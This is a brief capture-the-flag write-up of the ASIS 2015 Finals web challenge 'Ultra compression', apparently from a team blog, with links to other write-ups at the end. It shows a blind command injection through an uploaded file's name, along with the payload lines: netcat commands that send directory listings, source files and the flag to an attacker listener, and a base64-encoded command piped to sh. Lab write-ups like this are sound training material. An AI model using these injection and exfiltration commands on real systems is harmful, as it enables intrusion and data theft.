ASIS 2015 Finals: Ultra compression (web125)

Reading time ~1 minute

This challenge was solved by and the write up was written by teammates, nguyen and akg

Through testing to know it’s a blind cmd injection in filename of a file upload.

Set a host listen to a port and inject a cmd, ex: filename.txt; ls |nc ip port

To copy the source, find .. -iname '*gz'|xargs cat|nc ip port, analyze it, we have expl:

~  echo "cat /home/asis/flag.txt | nc ip port" | base64
<base64string>
~ a.txt| echo <base64string> | base64 -d | sh
ASIS{72a126946e40f67a04d926dd4786ff15}

GoogleCTF 2018 Quals: Web - BBS

Last weekend I played on the Google CTF 2018 Quals which was one of the best CTFs I played recently. They separated the easy challenges i...… Continue reading

0CTF 2017 Quals: Crypto challenges

Published on March 23, 2017

0CTF 2017 Quals: Choices (reverse, 297pts)

Published on March 23, 2017